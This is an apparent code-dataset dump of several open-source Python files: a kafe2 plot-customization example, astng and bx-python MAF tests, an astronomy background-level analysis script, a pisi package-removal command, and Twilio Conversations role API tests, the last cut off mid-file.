repo_name (string, 5-100 chars) | path (string, 4-299 chars) | copies (string, 990 classes) | size (string, 4-7 chars) | content (string, 666-1.03M chars) | license (string, 15 classes) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
dsavoiu/kafe2 | examples/005_convenience/customize.py | 1 | 4059 | """
kafe2 example: Plot Customization
=================================
This example is a cheat sheet for plot/report customization.
It briefly demonstrates methods that modify the optics of kafe2 output.
"""
from kafe2 import XYContainer, Fit, Plot
import matplotlib.pyplot as plt
# The same setup as in 001_line_fit/line_fit.py :
xy_data = XYContainer(x_data=[1.0, 2.0, 3.0, 4.0],
y_data=[2.3, 4.2, 7.5, 9.4])
xy_data.add_error(axis='x', err_val=0.1)
xy_data.add_error(axis='y', err_val=0.4)
line_fit = Fit(data=xy_data)
line_fit.do_fit()
# Non-LaTeX names are used in reports and other text-based output:
line_fit.assign_parameter_names(x='t', a='alpha', b='beta')
line_fit.assign_model_function_name('theta')
line_fit.assign_model_function_expression("{a} * {x} + {b}")
# Note: the model function expression is formatted as a Python string.
# The parameter names in curly brackets will be replaced with the names assigned above
# (or with the LaTeX names in the LaTeX expression further below).
# You could also just hard-code the parameter names like this:
# line_fit.assign_model_function_expression("alpha * t + beta")
line_fit.report()
# LaTeX names are used in plot info boxes:
line_fit.assign_parameter_latex_names(x='t', a='\\alpha', b='\\beta')
line_fit.assign_model_function_latex_name('\\theta')
line_fit.assign_model_function_latex_expression('{a} \\cdot {x} + {b}')
# Labels can be set for a fit.
# These labels are then used by all Plots created from said fit.
# If a Plot object also defines labels, those labels override the fit labels.
# The labels displayed in the info box:
line_fit.data_container.label = "My data label"
line_fit.model_label = "My model label"
# The labels displayed on the x/y axes:
line_fit.data_container.axis_labels = ["My x axis", "My y axis"]
plot = Plot(fit_objects=line_fit)
# Plot objects can be modified with the customize method which sets matplotlib keywords.
# The first argument specifies the subplot for which to set keywords.
# The second argument specifies which keyword to set.
# The third argument is a list of values to set for the keyword for each fit managed
# by the plot object.
plot.customize('data', 'label', ["My data label 2"]) # Overwrite data label in info box.
# plot.customize('data', 'label', [None]) # Hide data label in info box.
plot.customize('data', 'marker', ['o']) # Set the data marker shape in the plot.
plot.customize('data', 'markersize', [5]) # Set the data marker size in the plot.
plot.customize('data', 'color', ['blue']) # Set the data marker color in the plot.
plot.customize('data', 'ecolor', ['gray']) # Set the data errorbar color in the plot.
plot.customize('model_line', 'label', ['My model label 2']) # Set the model label in the info box.
# plot.customize('model_line', 'label', [None]) # Hide the model label in the info box.
plot.customize('model_line', 'color', ['lightgreen']) # Set the model line color in the plot.
plot.customize('model_line', 'linestyle', ['-']) # Set the style of the model line in the plot.
plot.customize('model_error_band', 'label', [r'$\pm 1 \sigma$']) # Error band label in info box.
# plot.customize('model_error_band', 'label', [None]) # Hide error band label.
plot.customize('model_error_band', 'color', ['lightgreen']) # Error band color in plot.
# plot.customize('model_error_band', 'hide', [True]) # Hide error band in plot and info box.
# Available keywords can be retrieved with Plot.get_keywords(subplot_type) .
# subplot_type is for example 'data', 'model_line', or 'model_error_band'.
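# For example (commented out; this assumes get_keywords simply returns an
# iterable of keyword names -- check your kafe2 version):
# print(plot.get_keywords('model_line'))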
# In addition to the customize method Plot has a few convenience methods for common operations:
plot.x_range = (0.8, 6) # Set the x range of the plot.
plot.y_range = (1, 11) # Set the y range of the plot.
plot.x_label = 'My x axis 2' # Overwrite the label of the x axis.
plot.y_label = 'My y axis 2' # Overwrite the label of the y axis.
plot.x_scale = 'log' # Set the x axis to a logarithmic scale.
plot.y_scale = 'log' # Set the y axis to a logarithmic scale.
# Finally, perform the plot:
plot.plot(ratio=True)
plt.show()
| gpl-3.0 | 5,711,633,710,796,409,000 | 45.125 | 99 | 0.698448 | false |
tkaitchuck/nupic | external/common/lib/python2.6/site-packages/logilab/astng/test/unittest_regrtest.py | 1 | 5380 | # copyright 2003-2011 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:[email protected]
# copyright 2003-2010 Sylvain Thenault, all rights reserved.
# contact mailto:[email protected]
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
from logilab.common.testlib import unittest_main, TestCase
from logilab.astng import ResolveError, MANAGER, Instance, nodes, YES, InferenceError
from logilab.astng.builder import ASTNGBuilder
from logilab.astng.raw_building import build_module
from logilab.astng.manager import ASTNGManager
import sys
from os.path import join, abspath, dirname
class NonRegressionTC(TestCase):
def setUp(self):
sys.path.insert(0, join(dirname(abspath(__file__)), 'regrtest_data'))
def tearDown(self):
sys.path.pop(0)
def brainless_manager(self):
manager = ASTNGManager()
# avoid caching into the ASTNGManager borg since we get problems
# with other tests :
manager.__dict__ = {}
manager.astng_cache = {}
manager._mod_file_cache = {}
manager.transformers = {}
return manager
def test_module_path(self):
man = self.brainless_manager()
mod = man.astng_from_module_name('package.import_package_subpackage_module')
package = mod.igetattr('package').next()
self.failUnlessEqual(package.name, 'package')
subpackage = package.igetattr('subpackage').next()
self.assertIsInstance(subpackage, nodes.Module)
self.assertTrue(subpackage.package)
self.failUnlessEqual(subpackage.name, 'package.subpackage')
module = subpackage.igetattr('module').next()
self.failUnlessEqual(module.name, 'package.subpackage.module')
def test_package_sidepackage(self):
manager = self.brainless_manager()
assert 'package.sidepackage' not in MANAGER.astng_cache
package = manager.astng_from_module_name('absimp')
self.assertIsInstance(package, nodes.Module)
self.assertTrue(package.package)
subpackage = package.getattr('sidepackage')[0].infer().next()
self.assertIsInstance(subpackage, nodes.Module)
self.assertTrue(subpackage.package)
self.failUnlessEqual(subpackage.name, 'absimp.sidepackage')
def test_living_property(self):
builder = ASTNGBuilder()
builder._done = {}
builder._module = sys.modules[__name__]
builder.object_build(build_module('module_name', ''), Whatever)
def test_new_style_class_detection(self):
try:
import pygtk
except ImportError:
self.skipTest('test skipped: pygtk is not available')
# XXX may fail on some pygtk version, because objects in
# gobject._gobject have __module__ set to gobject :(
builder = ASTNGBuilder()
data = """
import pygtk
pygtk.require("2.6")
import gobject
class A(gobject.GObject):
pass
"""
astng = builder.string_build(data, __name__, __file__)
a = astng['A']
self.failUnless(a.newstyle)
def test_pylint_config_attr(self):
try:
from pylint import lint
except ImportError:
self.skipTest('pylint not available')
mod = MANAGER.astng_from_module_name('pylint.lint')
pylinter = mod['PyLinter']
expect = ['OptionsManagerMixIn', 'object', 'MessagesHandlerMixIn',
'ReportsHandlerMixIn', 'BaseRawChecker', 'BaseChecker',
'OptionsProviderMixIn', 'ASTWalker']
self.assertListEqual([c.name for c in pylinter.ancestors()],
expect)
self.assert_(list(Instance(pylinter).getattr('config')))
infered = list(Instance(pylinter).igetattr('config'))
self.assertEqual(len(infered), 1)
self.assertEqual(infered[0].root().name, 'optparse')
self.assertEqual(infered[0].name, 'Values')
def test_numpy_crash(self):
"""test don't crash on numpy"""
        # a crash occurred somewhere in the past, and an
# InferenceError instead of a crash was better, but now we even infer!
try:
import numpy
except ImportError:
self.skipTest('test skipped: numpy is not available')
builder = ASTNGBuilder()
data = """
from numpy import multiply
multiply(1, 2, 3)
"""
astng = builder.string_build(data, __name__, __file__)
callfunc = astng.body[1].value.func
infered = callfunc.infered()
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], Instance)
class Whatever(object):
a = property(lambda x: x, lambda x: x)
if __name__ == '__main__':
unittest_main()
| gpl-3.0 | -6,657,232,164,024,697,000 | 36.103448 | 85 | 0.659851 | false |
jmontgom10/Mimir_pyPol | oldCode/04a_analyzeBackgroundLevels.py | 1 | 9158 | import os
import sys
import subprocess
import datetime
import numpy as np
from astropy.io import ascii
from astropy.table import Table, Column, vstack
from astropy.wcs import WCS
from astropy.wcs.utils import proj_plane_pixel_scales
from astropy.coordinates import SkyCoord, ICRS
from astropy.stats import gaussian_fwhm_to_sigma, sigma_clipped_stats
from scipy.stats import norm, f
from scipy.odr import *
from scipy.optimize import minimize
from scipy.ndimage.filters import median_filter, gaussian_filter1d
from photutils import detect_sources, Background
# For debugging
import matplotlib.pyplot as plt
# Add the AstroImage class
import astroimage as ai
# Add the header handler to the BaseImage class
from Mimir_header_handler import Mimir_header_handler
ai.reduced.ReducedScience.set_header_handler(Mimir_header_handler)
ai.set_instrument('mimir')
# This script will read in the background level estimated for each on-target
# image in the previous step. The background level in the dimmest parts of the
# on-target image will be computed directly, and the residual between the direct
# estimate and the interpolation will be stored. The distribution of these
# residuals will be used to estimate which interpolated background levels can be
# trusted.
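# In outline (matching the code below): for each usable image,
#   residual = (sigma-clipped mean of its "nebula free" pixels) - (interpolated level)
# and an interpolated background is flagged as untrustworthy whenever its
# residual lies more than 5 sigma from the sigma-clipped mean residual, first
# within its PPOL group and then again across all groups.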
#==============================================================================
# *********************** CUSTOM USER CODE ************************************
# this is where the user specifies where the raw data is stored
# and some of the subdirectory structure to find the actual .FITS images
#==============================================================================
# This is the location of all PPOL reduction directory
PPOL_dir = 'C:\\Users\\Jordan\\FITS_data\\Mimir_data\\PPOL_reduced'
# Build the path to the S3_Asotremtry files
S3dir = os.path.join(PPOL_dir, 'S3_Astrometry')
# This is the location where all pyPol data will be saved
pyPol_data = 'C:\\Users\\Jordan\\FITS_data\\Mimir_data\\pyPol_data'
# This is the directory where the 2MASS tiles of the targets have been saved
# Go to "http://hachi.ipac.caltech.edu/" to download 2MASS tiles
TMASSdir = "C:\\Users\\Jordan\\Libraries\\python\\Mimir_pyPol\\2MASSimages"
# Setup new directory for background subtracted data
bkgSubDir = os.path.join(pyPol_data, 'bkgSubtracted')
if (not os.path.isdir(bkgSubDir)):
os.mkdir(bkgSubDir, 0o755)
# Read in Kokopelli mask generated in previous step
kokopelliMask = (AstroImage('kokopelliMask.fits').arr != 0)
# Read in the indexFile data and select the filenames
indexFile = os.path.join(pyPol_data, 'reducedFileIndex.csv')
fileIndex = Table.read(indexFile, format='csv')
# Grab the file basenames for later use
fileIndexFileNames = np.array([os.path.basename(file1)
for file1 in fileIndex['Filename'].data])
# Modify the fileIndex to include rejections by residual value
if 'Background Cut' not in fileIndex.keys():
fileIndex.add_column(Column(name='Background Cut',
data = np.repeat(0, len(fileIndex))))
# Determine which parts of the fileIndex pertain to science images
useFiles = np.where(np.logical_and(fileIndex['Use'].data == 1,
fileIndex['Background'].data >= 0))
skipFiles = np.where(np.logical_or(fileIndex['Use'].data == 0,
fileIndex['Background'].data < 0))
# Cull the file index to only include files selected for use
fileIndex1 = fileIndex[useFiles]
fileIndex2 = fileIndex[skipFiles]
# Group files by target and waveband
groupFileIndex = fileIndex1.group_by(['PPOL Name'])
allFileList = []
allResidualList = []
# Loop through all the usable images and compute their residuals
for group in groupFileIndex.groups:
# Grab the current target information
thisTarget = str(np.unique(group['Target'].data)[0])
thisWaveband = str(np.unique(group['Waveband'].data)[0])
thisPPOLname = str(np.unique(group['PPOL Name'].data)[0])
# if thisPPOLname != 'NGC2023_H3': continue
print('\nProcessing images for')
print('\tPPOL Group : {0}'.format(thisPPOLname))
print('')
# Read in the 2MASS image
TMASSfile = os.path.join(TMASSdir, '_'.join([thisTarget, thisWaveband]) + '.fits')
TMASSimg = AstroImage(TMASSfile)
TMASSwcs = WCS(TMASSimg.header)
# Estimate the "nebula free" level
mean, median, stddev = sigma_clipped_stats(TMASSimg.arr.flatten())
bkgThresh = median - 0.5*stddev
# Find the "nebula free" pixels
bkgRegion = TMASSimg.arr < bkgThresh
neighborCount = np.zeros_like(bkgRegion, dtype=int)
for dx in range(-1,2):
for dy in range(-1,2):
neighborCount += np.roll(np.roll(bkgRegion, dy, axis = 0), dx, axis = 1)
    # Keep pixels where at least 5 of the 9 cells in the 3x3 neighborhood (including the pixel itself) are background
bkgRegion = neighborCount > 4
groupFileList = []
groupResidualList = []
for file1, interpBkg in zip(group['Filename'].data, group['Background'].data):
# Read in this image.
img = AstroImage(file1)
# See which pixels in this image map to background pixels
ny, nx = img.arr.shape
yy, xx = np.mgrid[0:ny, 0:nx]
wcs = WCS(img.header)
RAs, Decs = wcs.wcs_pix2world(xx, yy, 0)
Tx, Ty = TMASSwcs.wcs_world2pix(RAs, Decs, 0)
Tx, Ty = (Tx.round()).astype(int), (Ty.round()).astype(int)
# Grab the value of the TMASS background mask for each pixel
MimirBkgRegion = bkgRegion[Ty, Tx]
# Get the indices of the background pixel
bkgInds = np.where(MimirBkgRegion)
bkgVals = img.arr[bkgInds]
# Compute the direct estimate of background level
mean, median, stddev = sigma_clipped_stats(bkgVals)
# Compute the residual level and store it in the list
thisResidual = mean - interpBkg
groupFileList.append(os.path.basename(file1))
groupResidualList.append(thisResidual)
# Place this residual list in the final total residual list
allFileList.extend(groupFileList)
allResidualList.extend(groupResidualList)
# Convert the lists to arrays
groupFileList = np.array(groupFileList)
groupResidualList = np.array(groupResidualList)
    # Check for outliers and mark residuals more than 5 sigma from this group's mean
mean, median, stddev = sigma_clipped_stats(groupResidualList)
residMin, residMax = mean - 5*stddev, mean + 5*stddev
badInds = np.where(np.logical_or(groupResidualList < residMin,
groupResidualList > residMax))
# If some of these residuals are more than 5-sigma from the group mean, then
# mark them as bad background levels in the file index.
if len(badInds[0]) > 0:
# Select the file names of the bad backgrounds
badFiles = groupFileList[badInds]
# Grab the indices of these files in the fileIndex and mark them as bad
fileIndexInds = np.array([np.where(fileIndexFileNames == file1)[0][0]
for file1 in badFiles])
fileIndex['Background Cut'][fileIndexInds] = 1
# Convert the lists to arrays
allFileList = np.array(allFileList)
allResidualList = np.array(allResidualList)
# Now that we have the residuals for each group, plot them up as histograms
# # Start by parsing out the residuals for each group
# Now create a plot with all groups clumpped together
fig2 = plt.figure()
ax2 = fig2.add_subplot(1,1,1)
ax2.hist(allResidualList, 10, normed=1, histtype='stepfilled', stacked=True)
plt.xlabel('Residual Counts')
plt.ylabel('Fraction of Fields')
# Prepare some statistical comments
xmin, xmax = ax2.get_xlim()
ymin, ymax = ax2.get_ylim()
mean, median, stddev = sigma_clipped_stats(allResidualList)
# Mark the mean
ax2.axvline(mean, color='k', linewidth=2.0)
ax2.text(mean+0.02*(xmax-xmin), 0.95*ymax, 'mean', rotation='vertical')
# Mark the median
ax2.axvline(median, color='k', linewidth=2.0)
ax2.text(median-0.04*(xmax-xmin), 0.95*ymax, 'median', rotation='vertical')
# Mark the 3-sigma upper and lower limits
ax2.axvline(median - 5*stddev, color='k', linewidth=2.0)
ax2.axvline(median + 5*stddev, color='k', linewidth=2.0)
# Prepare the limits of the acceptable residual range
residMin, residMax = mean - 5*stddev, mean + 5*stddev
# Find any background levels that are outside the 5-sigma limits
badInds = np.where(np.logical_or(allResidualList < residMin,
allResidualList > residMax))
# If some of these residuals are more than 5-sigma from the group mean, then
# mark them as bad background levels in the file index.
if len(badInds[0]) > 0:
# Select the file names of the bad backgrounds
badFiles = allFileList[badInds]
# Grab the indices of these files in the fileIndex and mark them as bad
fileIndexInds = np.array([np.where(fileIndexFileNames == file1)[0][0]
for file1 in badFiles])
fileIndex['Background Cut'][fileIndexInds] = 1
# Then save to disk
print('*************************************')
print('Writing all background levels to disk')
print('*************************************')
import pdb; pdb.set_trace()  # debug breakpoint left in place; requires an interactive session (remove to run unattended)
fileIndex.write(indexFile, format='csv')
print('Done!')
| mit | -186,222,741,989,341,950 | 37.478992 | 86 | 0.683009 | false |
SolusOS-discontinued/pisi | pisi/cli/remove.py | 2 | 2076 | # -*- coding:utf-8 -*-
#
# Copyright (C) 2005 - 2007, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import optparse
import gettext
__trans = gettext.translation('pisi', fallback=True)
_ = __trans.ugettext
import pisi.cli.command as command
import pisi.context as ctx
import pisi.api
import pisi.db
class Remove(command.PackageOp):
__doc__ = _("""Remove PiSi packages
Usage: remove <package1> <package2> ... <packagen>
Remove package(s) from your system. Just give the package names to remove.
You can also specify components instead of package names, which will be
expanded to package names.
""")
__metaclass__ = command.autocommand
def __init__(self, args):
super(Remove, self).__init__(args)
self.componentdb = pisi.db.componentdb.ComponentDB()
name = ("remove", "rm")
def options(self):
group = optparse.OptionGroup(self.parser, _("remove options"))
super(Remove, self).options(group)
group.add_option("--purge", action="store_true",
default=False, help=_("Removes everything including changed config files of the package"))
group.add_option("-c", "--component", action="append",
default=None, help=_("Remove component's and recursive components' packages"))
self.parser.add_option_group(group)
def run(self):
self.init()
components = ctx.get_option('component')
if not components and not self.args:
self.help()
return
packages = []
if components:
for name in components:
if self.componentdb.has_component(name):
packages.extend(self.componentdb.get_union_packages(name, walk=True))
packages.extend(self.args)
pisi.api.remove(packages)
| gpl-2.0 | 588,452,316,152,080,900 | 29.985075 | 111 | 0.644509 | false |
bxlab/HiFive_Paper | Scripts/HiCLib/bx-python-0.7.1/build/lib.linux-x86_64-2.7/bx/align/maf_tests.py | 7 | 8301 | """
Tests for `bx.align.maf`.
"""
import unittest
import sys
import bx.align as align
import bx.align.maf as maf
from StringIO import StringIO
# A simple MAF from the rat paper days
test_maf = """##maf version=1 scoring=humor.v4
# humor.v4 R=30 M=10 /cluster/data/hg15/bed/blastz.mm3/axtNet300/chr1.maf
# /cluster/data/hg15/bed/blastz.rn3/axtNet300/chr1.maf
a score=0.128
s human_hoxa 100 8 + 100257 ACA-TTACT
s horse_hoxa 120 9 - 98892 ACAATTGCT
s fugu_hoxa 88 7 + 90788 ACA--TGCT
a score=0.071
s human_unc 9077 8 + 10998 ACAGTATT
# Comment
s horse_unc 4555 6 - 5099 ACA--ATT
s fugu_unc 4000 4 + 4038 AC----TT
"""
# A more complicated MAF with synteny annotation and such
test_maf_2 = """##maf version=1 scoring=autoMZ.v1
a score=3656.000000
s hg17.chr1 2005 34 + 245522847 TGTAACTTAATACCACAACCAGGCATAGGGG--AAA-------------
s rheMac2.chr11 9625228 31 + 134511895 TGTAACCTCTTACTGCAACAAGGCACAGGGG------------------
i rheMac2.chr11 C 0 I 1678
s panTro1.chr1 2014 34 + 229575298 TGTAACTTAATACCACAACCAGGCATGGGGG--AAA-------------
i panTro1.chr1 C 0 C 0
s bosTau2.chr5 64972365 47 + 76426644 TCCAGCCATGTGTTGTGATCAG--CCAGGGGCTAAAGCCATGGCGGTAG
i bosTau2.chr5 C 0 I 1462
s canFam2.chr27 45129665 31 + 48908698 TTTGACTCTGTGCTCTTATCAGGCCCAAGGG------------------
i canFam2.chr27 C 0 I 1664
e danRer3.chr18 2360867 428 + 50308305 I
e oryCun1.scaffold_139397 643 1271 - 4771 I
e loxAfr1.scaffold_5603 58454 1915 + 68791 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e rn3.chr4 29161032 1524 - 187371129 I
e mm7.chr6 28091695 3290 - 149646834 I
"""
# A MAF to test slicing upon
test_maf_3 = """##maf version=1 scoring=none
a score=0
s apple 34 64 + 110 AGGGA---GTTCGTCACT------GTCGTAAGGGTTCAGA--CTGTCTATGTATACACAAGTTGTGTTGCA--ACCG
s orange 19 61 - 100 AGGGATGCGTT--TCACTGCTATCGTCGTA----TTCAGACTTCG-CTATCT------GAGTTGT---GCATTACCG
"""
def test_reader():
reader = maf.Reader( StringIO( test_maf ) )
assert reader.attributes["version"] == "1"
assert reader.attributes["scoring"] == "humor.v4"
a = reader.next()
assert a.score == 0.128
assert len( a.components ) == 3
check_component( a.components[0], "human_hoxa", 100, 8, "+", 100257, "ACA-TTACT" )
check_component( a.components[1], "horse_hoxa", 120, 9, "-", 98892, "ACAATTGCT" )
check_component( a.components[2], "fugu_hoxa", 88, 7, "+", 90788, "ACA--TGCT" )
a = reader.next()
assert a.score == 0.071
assert len( a.components ) == 3
check_component( a.components[0], "human_unc", 9077, 8, "+", 10998, "ACAGTATT" )
check_component( a.components[1], "horse_unc", 4555, 6, "-", 5099, "ACA--ATT" )
check_component( a.components[2], "fugu_unc", 4000, 4, "+", 4038, "AC----TT" )
a = reader.next()
assert a is None
reader.close()
def test_writer():
val = StringIO()
writer = maf.Writer( val, { 'scoring':'foobar' } )
a = align.Alignment()
a.score = 7009
a.components.append( align.Component( src="human_hoxa", start=100, size=9, strand="+", src_size=1000257, text="ACA-TTACT" ) )
a.components.append( align.Component( src="horse_hoxa", start=120, size=10, strand="-", src_size=98892, text="ACAATTGCT" ) )
check_component( a.components[0], "human_hoxa", 100, 9, "+", 1000257, "ACA-TTACT" )
check_component( a.components[1], "horse_hoxa", 120, 10, "-", 98892, "ACAATTGCT" )
writer.write( a )
assert val.getvalue() == """##maf version=1 scoring=foobar
a score=7009
s human_hoxa 100 9 + 1000257 ACA-TTACT
s horse_hoxa 120 10 - 98892 ACAATTGCT
"""
def test_slice():
a = align.Alignment()
a.score = "7009"
a.components.append( align.Component( src="human_hoxa", start=100, size=9, strand="+", src_size=100257, text="ACA-TTACT" ) )
a.components.append( align.Component( src="horse_hoxa", start=120, size=10, strand="-", src_size=98892, text="ACAATTGCT" ) )
b = a.slice_by_component( 0, 101, 105 )
check_component( b.components[0], src="human_hoxa", start=101, size=4, strand="+", src_size=100257, text="CA-TT" )
check_component( b.components[1], src="horse_hoxa", start=121, size=5, strand="-", src_size=98892, text ="CAATT" )
# test slicing with + strand src
reader = maf.Reader( StringIO( test_maf_3 ) )
a = reader.next()
b = a.slice_by_component( 0, 40, 62 )
check_component( b.components[0], src="apple", start=40, size=22, strand="+", src_size=110, text="TTCGTCACT------GTCGTAAGGGTTC" )
check_component( b.components[1], src="orange", start=28, size=22, strand="-", src_size=100, text="TT--TCACTGCTATCGTCGTA----TTC" )
# test slicing with - strand src
b = a.slice_by_component( 1, 30, 68 )
check_component( b.components[0], src="apple", start=46, size=41, strand="+", src_size=110, text="ACT------GTCGTAAGGGTTCAGA--CTGTCTATGTATACACAAGTTG" )
check_component( b.components[1], src="orange", start=32, size=38, strand="-", src_size=100, text="ACTGCTATCGTCGTA----TTCAGACTTCG-CTATCT------GAGTTG" )
a = reader.next()
assert a is None
def test_with_synteny():
reader = maf.Reader( StringIO( test_maf_2 ), parse_e_rows=True )
a = reader.next()
check_component( a.components[0], "hg17.chr1", 2005, 34, "+", 245522847, "TGTAACTTAATACCACAACCAGGCATAGGGG--AAA-------------")
check_component( a.components[1], "rheMac2.chr11", 9625228, 31, "+", 134511895, "TGTAACCTCTTACTGCAACAAGGCACAGGGG------------------")
print a.components[1].synteny_left
assert a.components[1].synteny_left == ( maf.MAF_CONTIG_STATUS, 0 )
assert a.components[1].synteny_right == ( maf.MAF_INSERT_STATUS, 1678 )
rat = a.get_component_by_src_start( "rn3." )
check_component( rat, "rn3.chr4", 29161032, 1524, "-", 187371129, None )
assert rat.synteny_empty == maf.MAF_INSERT_STATUS
def test_write_with_synteny():
reader = maf.Reader( StringIO( test_maf_2 ), parse_e_rows=True )
a = reader.next()
val = StringIO()
writer = maf.Writer( val, { 'scoring':'foobar' } )
writer.write( a )
actual = val.getvalue()
expected = """##maf version=1 scoring=foobar
a score=3656.0
s hg17.chr1 2005 34 + 245522847 TGTAACTTAATACCACAACCAGGCATAGGGG--AAA-------------
s rheMac2.chr11 9625228 31 + 134511895 TGTAACCTCTTACTGCAACAAGGCACAGGGG------------------
i rheMac2.chr11 C 0 I 1678
s panTro1.chr1 2014 34 + 229575298 TGTAACTTAATACCACAACCAGGCATGGGGG--AAA-------------
i panTro1.chr1 C 0 C 0
s bosTau2.chr5 64972365 47 + 76426644 TCCAGCCATGTGTTGTGATCAG--CCAGGGGCTAAAGCCATGGCGGTAG
i bosTau2.chr5 C 0 I 1462
s canFam2.chr27 45129665 31 + 48908698 TTTGACTCTGTGCTCTTATCAGGCCCAAGGG------------------
i canFam2.chr27 C 0 I 1664
e danRer3.chr18 2360867 428 + 50308305 I
e oryCun1.scaffold_139397 643 1271 - 4771 I
e loxAfr1.scaffold_5603 58454 1915 + 68791 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e rn3.chr4 29161032 1524 - 187371129 I
e mm7.chr6 28091695 3290 - 149646834 I
"""
print actual
print "---"
print expected
assert actual == expected
def check_component( c, src, start, size, strand, src_size, text ):
assert c.src == src
assert c.start == start
assert c.size == size
assert c.strand == strand
assert c.src_size == src_size
assert c.text == text | bsd-3-clause | 185,809,693,163,886,140 | 42.694737 | 155 | 0.58511 | false |
twilio/twilio-python | tests/integration/conversations/v1/test_role.py | 1 | 8325 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base import serialize
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class RoleTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles.create(friendly_name="friendly_name", type="conversation", permission=['permission'])
values = {
'FriendlyName': "friendly_name",
'Type': "conversation",
'Permission': serialize.map(['permission'], lambda e: e),
}
self.holodeck.assert_has_request(Request(
'post',
'https://conversations.twilio.com/v1/Roles',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.conversations.v1.roles.create(friendly_name="friendly_name", type="conversation", permission=['permission'])
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update(permission=['permission'])
values = {'Permission': serialize.map(['permission'], lambda e: e), }
self.holodeck.assert_has_request(Request(
'post',
'https://conversations.twilio.com/v1/Roles/RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
data=values,
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update(permission=['permission'])
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://conversations.twilio.com/v1/Roles/RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://conversations.twilio.com/v1/Roles/RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles.list()
self.holodeck.assert_has_request(Request(
'get',
